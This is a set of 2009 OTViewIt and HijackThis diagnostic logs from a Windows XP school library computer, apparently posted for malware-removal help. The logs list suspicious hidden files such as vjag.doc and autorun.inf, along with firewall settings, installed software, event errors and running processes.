[2009/03/20 08:56:46 | 00,001,844 | -HS- | C] () -- C:\WINDOWS\System32\vjag.doc
[2009/03/20 08:56:44 | 00,000,000 | RHSD | C] -- C:\WINDOWS\System32\auto
[2009/03/20 08:56:12 | 00,021,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\hidserv.dll
[2009/03/20 08:56:12 | 00,021,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\hidserv.dll
[2009/03/20 08:56:06 | 00,032,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\drivers\usbccgp.sys
[2009/03/20 08:56:06 | 00,032,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\usbccgp.sys
[2009/03/06 13:11:08 | 00,000,000 | ---D | C] -- C:\Library
[2009/03/06 13:10:37 | 00,000,000 | ---D | C] -- C:\Program Files\PEM
[2009/03/06 13:10:32 | 00,000,000 | -H-D | C] -- C:\Program Files\Zero G Registry
[2009/03/06 13:10:32 | 00,000,000 | ---D | C] -- C:\Program Files\TestNav
[2009/02/11 16:01:29 | 00,000,000 | ---D | C] -- C:\WINDOWS\SQL9_KB960089_ENU

========== Files - Modified Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 15:05:50 | 02,442,498 | -HS- | M] () -- C:\autorun.inf
[2009/04/02 14:55:44 | 00,000,402 | ---- | M] () -- C:\WINDOWS\tasks\gpupdate.job
[2009/04/02 14:55:42 | 00,002,206 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2009/04/02 14:55:17 | 00,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2009/04/02 14:51:54 | 00,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2009/04/02 14:51:46 | 00,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2009/04/02 14:23:20 | 05,362,852 | -H-- | M] () -- C:\Documents and Settings\administrator.VVIEW\Local Settings\Application Data\IconCache.db
[2009/04/02 13:34:08 | 00,401,720 | ---- | M] (Trend Micro Inc.) -- C:\HiJackThis.exe.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\Desktop\powerpnt.exe.exe
[2009/04/01 13:49:56 | 04,840,017 | ---- | M] () -- C:\Documents and Settings\administrator.VVIEW\Desktop\Virus Script.rtf
[2009/04/01 12:00:53 | 00,000,410 | ---- | M] () -- C:\WINDOWS\tasks\Schedule Task Weekly.job
[2009/04/01 09:05:24 | 00,000,000 | ---- | M] () -- C:\WINDOWS\System32\MSVolume.dll
[2009/04/01 08:54:48 | 00,000,162 | -H-- | M] () -- C:\WINDOWS\System32\~$vjag.doc
[2009/04/01 08:54:10 | 00,001,844 | -HS- | M] () -- C:\WINDOWS\System32\vjag.doc
[2009/03/23 08:15:27 | 00,001,724 | -H-- | M] () -- C:\Documents and Settings\administrator.VVIEW\My Documents\Default.rdp
[2009/03/20 16:04:01 | 00,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
[2009/03/20 13:27:06 | 00,000,072 | ---- | M] () -- C:\WINDOWS\bi_group.ini
[2009/03/20 09:08:14 | 00,523,324 | ---- | M] () -- C:\WINDOWS\System32\PerfStringBackup.INI
[2009/03/20 09:08:14 | 00,488,332 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2009/03/20 09:08:14 | 00,088,830 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2009/03/16 15:07:22 | 00,278,152 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2009/03/16 15:01:22 | 00,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2009/02/26 06:02:48 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccessfilter.sys
[2009/02/26 06:02:37 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccesscontrol.sys
[2009/02/25 15:54:59 | 24,768,960 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\MRT.exe
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\win32k.sys
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\win32k.sys

========== Custom Scans ==========

< End of report >

Extras
OTViewIt Extras logfile created on: 4/2/2009 3:05:50 PM - Run 2
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\administrator.VVIEW\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1.99 Gb Total Physical Memory | 1.43 Gb Available Physical Memory | 71.78% Memory free
3.84 Gb Paging File | 3.37 Gb Available in Paging File | 87.82% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.50 Gb Total Space | 61.36 Gb Free Space | 82.36% Space Free | Partition Type: NTFS
Drive D: | 64.77 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 103_LIB_S3
Current User Name: Administrator
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled"=1
"AntiVirusDisableNotify"=0
"FirewallDisableNotify"=0
"UpdatesDisableNotify"=0
"AntiVirusOverride"=0
"FirewallOverride"=0
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]
"DisableMonitoring"=1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
"EnableFirewall"=0
"DoNotAllowExceptions"=0
"DisableNotifications"=0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts]

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour
[2008/03/30 10:36:34 | 20,638,504 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes
[2008/05/21 04:37:24 | 12,844,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP

========== (O10) Winsock2 Catalogs ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\]
NameSpace_Catalog5\Catalog_Entries\000000000004 [mdnsNSP] -- C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)

========== (O18) Protocol Handlers ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
ipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL ipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
msdaipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\oledb:{E1D2BF40-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAIPP.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2006/10/26 13:45:02 | 00,873,216 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll (ms-help:{314111c7-a502-11d2-bbca-00c04f8ec294} (HKLM) [HxProtocol Class])

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2007/05/10 13:45:34 | 08,069,464 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Web Components\11\OWC11.DLL (mso-offdap11:{32505114-5902-49B2-880A-1F7738E5A384} (HKLM) [Data Page Plugable Protocal mso-offdap11 Handler])

========== (O18) Protocol Filters ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\] - Protocol Filters
[2006/10/26 21:41:48 | 00,044,344 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSOXMLMF.DLL text/xml:{807563E5-5146-11D5-A672-00B0D022E945} (HKLM) [Microsoft Office InfoPath XML Mime Filter]

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{02DFF6B1-1654-411C-8D7B-FD6052EF016F}"=Apple Software Update
"{034759DA-E21A-4795-BFB3-C66D17FAD183}"=Sophos Anti-Virus
"{08786A53-D98F-484A-867C-3302BC5AE30D}"=Digital Blue QX5 Microscope
"{08CA9554-B5FE-4313-938F-D4A417B81175}"=QuickTime
"{15C418EB-7675-42be-B2B3-281952DA014D}"=Sophos AutoUpdate
"{2348B97D-C991-438F-BC44-294C931E7B8B}"=SMART Essentials for Educators
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}"=Java™ 6 Update 13
"{281ECE39-F043-492B-8337-F2E546B5604A}"=PowerDVD
"{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}"=Microsoft SQL Server 2005 Express Edition (MSSMLBIZ)
"{2BA00471-0328-3743-93BD-FA813353A783}"=Microsoft .NET Framework 3.0 Service Pack 1
"{30465B6C-B53F-49A1-9EBA-A3F187AD502E}"=Sonic Update Manager
"{3248F0A8-6813-11D6-A77B-00B0D0160050}"=Java™ 6 Update 5
"{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}"=WebFldrs XP
"{353D20CC-719B-4A60-AD33-D03F88C10330}"=Microsoft Office Accounting PayPal Addin
"{44734179-8A79-4DEE-BB08-73037F065543}"=Apple Mobile Device Support
"{46486451-E60F-42C3-92D7-796D8594688A}"=SMART Board Software
"{46614A49-222A-48EF-87A9-BFD603E608E1}"=Microsoft Office Accounting Fixed Asset Manager
"{47BF1BD6-DCAC-468F-A0AD-E5DECC2211C3}"=Bonjour
"{50120000-1105-0000-0000-0000000FF1CE}"=Microsoft Office 2007 Primary Interop Assemblies
"{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}"=Microsoft SQL Server Setup Support Files (English)
"{56B4002F-671C-49F4-984C-C760FE3806B5}"=Microsoft SQL Server VSS Writer
"{585776BC-4BD6-4BD2-A19A-1D6CB44A403B}"=iTunes
"{5EE30018-CB99-464D-903D-F794592F503B}"=Lightspeed Systems User Agent v2.00.00
"{5FA793A6-0071-42C1-9355-8F69A428C44F}"=Microsoft Office Accounting ADP Payroll Addin
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}"=Microsoft Silverlight
"{8A708DD8-A5E6-11D4-A706-000629E95E20}"=Intel® Graphics Media Accelerator Driver
"{8C711818-076E-475C-B95B-DF11CD9D8DBE}"=Microsoft Office Accounting Equifax Addin
"{90120000-0010-0409-0000-0000000FF1CE}"=Microsoft Software Update for Web Folders (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}"=Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0016-0409-0000-0000000FF1CE}"=Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0018-0409-0000-0000000FF1CE}"=Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0019-0409-0000-0000000FF1CE}"=Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001A-0409-0000-0000000FF1CE}"=Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001B-0409-0000-0000000FF1CE}"=Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0409-0000-0000000FF1CE}"=Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_PROHYBRIDR_{3EC77D26-799B-4CD8-914F-C1565E796173}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-040C-0000-0000000FF1CE}"=Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_PROHYBRIDR_{430971B1-C31E-45DA-81E0-72C095BAB72C}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0C0A-0000-0000000FF1CE}"=Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_PROHYBRIDR_{F7A31780-33C4-4E39-951A-5EC9B91D7BF1}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-002C-0409-0000-0000000FF1CE}"=Microsoft Office Proofing (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}"=Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0115-0409-0000-0000000FF1CE}"=Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0117-0409-0000-0000000FF1CE}"=Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90A40409-6000-11D3-8CFE-0150048383C9}"=Microsoft Office 2003 Web Components
"{91120000-0031-0000-0000-0000000FF1CE}"=Microsoft Office Professional Hybrid 2007
"{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{A06275F4-324B-4E85-95E6-87B2CD729401}"=Windows Defender
"{A939D341-5A04-4E0A-BB55-3E65B386432D}"=Microsoft Office Small Business Connectivity Components
"{AC76BA86-7AD7-1033-7B44-A81200000003}"=Adobe Reader 8.1.2
"{B0717D5A-1976-482B-9ADF-F19631A541A4}"=Microsoft Office Accounting 2007
"{B32C4059-6E7A-41EF-AD20-56DF1872B923}"=Business Contact Manager for Outlook 2007 SP1
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1"=Spybot - Search & Destroy
"{B508B3F1-A24A-32C0-B310-85786919EF28}"=Microsoft .NET Framework 2.0 Service Pack 1
"{B7F54262-AB66-44B3-88BF-9FC69941B643}"=Broadcom Gigabit Integrated Controller
"{BAF78226-3200-4DB4-BE33-4D922A799840}"=Windows Presentation Foundation
"{BD68F46D-8A82-4664-8E68-F87C55BDEFD4}"=Microsoft SQL Server Native Client
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}"=Microsoft .NET Framework 1.1
"{F0A37341-D692-11D4-A984-009027EC0A9C}"=SoundMAX
"{FCD9CD52-7222-4672-94A0-A722BA702FD0}"=Dell Resource CD
"{FF11005D-CBC8-45D5-A288-25C7BB304121}"=Sophos Remote Management System
"{FF9278B4-1A52-4E18-A668-E9F2219F5798}"=Classroom Performance System
"9C7E96126D886BC04FAA6ABAD9312271DB76E1F1"=Windows Driver Package - Digital Blue (marsqx5) Image (04/04/2007 1.0.0.0)
"Adobe Flash Player ActiveX"=Adobe Flash Player ActiveX
"Adobe Shockwave Player"=Adobe Shockwave Player 11
"Ask Toolbar_is1"=Ask Toolbar
"Business Contact Manager"=Business Contact Manager for Outlook 2007 SP1
"Dell_HostCD"=Dell Software Uninstall
"ePatLauncher"=ePatLauncher
"HijackThis"=HijackThis 2.0.2
"IDNMitigationAPIs"=Microsoft Internationalized Domain Names Mitigation APIs
"InstallShield_{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"Lotus Notes"=Lotus Notes
"Microsoft .NET Framework 1.1 (1033)"=Microsoft .NET Framework 1.1
"Microsoft Office Accounting 2007"=Microsoft Office Accounting 2007
"Microsoft SQL Server 2005"=Microsoft SQL Server 2005
"MSCompPackV1"=Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping"=Microsoft National Language Support Downlevel APIs
"PROHYBRIDR"=2007 Microsoft Office system
"TestNav"=TestNav
"WIC"=Windows Imaging Component
"Windows Media Format Runtime"=Windows Media Format 11 runtime
"Windows Media Player"=Windows Media Player 11
"Windows XP Service Pack"=Windows XP Service Pack 3
"WMFDist11"=Windows Media Format 11 runtime
"wmp11"=Windows Media Player 11
"Wudf01000"=Microsoft User-Mode Driver Framework Feature Pack 1.0
"XpsEPSC"=XML Paper Specification Shared Components Pack 1.0

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 3/30/2009 5:00:43 PM | Computer Name = 103_LIB_S3 | Source = MPSampleSubmission | ID = 5000
Description = EventType mptelemetry, P1 80072efd, P2 endsearch, P3 search, P4 1.1.1593.0,
P5 mpsigdwn.dll, P6 1.1.1593.0, P7 windows defender, P8 NIL, P9 NIL, P10 NIL.

Error - 3/31/2009 1:00:18 PM | Computer Name = 103_LIB_S3 | Source = MPSampleSubmission | ID = 5000
Description = EventType mptelemetry, P1 80072efd, P2 endsearch, P3 search, P4 1.1.1593.0,
P5 mpsigdwn.dll, P6 1.1.1593.0, P7 windows defender, P8 NIL, P9 NIL, P10 NIL.

[ System Events ]
Error - 1/10/2009 1:52:06 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/10/2009 3:25:08 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/18/2009 5:03:41 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/21/2009 6:16:21 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/21/2009 7:17:08 PM | Computer Name = 103_LIB_S3 | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
103_COUNSELOR that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{346168FD-2809-. The master browser is stopping or an election is being
forced.

Error - 1/23/2009 3:20:09 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 2/2/2009 9:43:29 AM | Computer Name = 103_LIB_S3 | Source = Windows Update Agent | ID = 16
Description = Unable to Connect: Windows is unable to connect to the automatic updates
service and therefore cannot download and install updates according to the set
schedule. Windows will continue to try to establish a connection.

Error - 2/4/2009 9:43:30 AM | Computer Name = 103_LIB_S3 | Source = Windows Update Agent | ID = 16
Description = Unable to Connect: Windows is unable to connect to the automatic updates
service and therefore cannot download and install updates according to the set
schedule. Windows will continue to try to establish a connection.

Error - 3/20/2009 9:55:57 AM | Computer Name = 103_LIB_S3 | Source = SAVOnAccessFilter | ID = 3997759
Description = Failed to obtain volume information from mount manager.

Error - 3/31/2009 5:16:46 PM | Computer Name = 103_LIB_S3 | Source = Dhcp | ID = 1002
Description = The IP address lease 10.138.25.172 for the Network Card with network
address 00137217D6AA has been denied by the DHCP server 10.138.8.6 (The DHCP Server
sent a DHCPNACK message).


< End of report >

HiJackThis
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:07:18 PM, on 4/2/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
C:\Program Files\Sophos\Remote Management System\RouterNT.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Sophos\AutoUpdate\ALMon.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\HiJackThis.exe.exe
C:\WINDOWS\System32\cmd.exe
C:\WINDOWS\system32\xcopy.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.vview.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://go.microsoft.com/fwlink/?LinkId=74005
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AskBar BHO - {201f27d4-3704-41d6-89c1-aa35e39143ed} - C:\Program Files\AskBarDis\bar\bin\askBar.dll
O2 - BHO: Sophos Web Content Scanner - {39EA7695-B3F2-4C44-A4BC-297ADA8FD235} - C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SMART Notebook Download Plugin - {67BCF957-85FC-4036-8DC4-D4D80E00A77B} - C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll
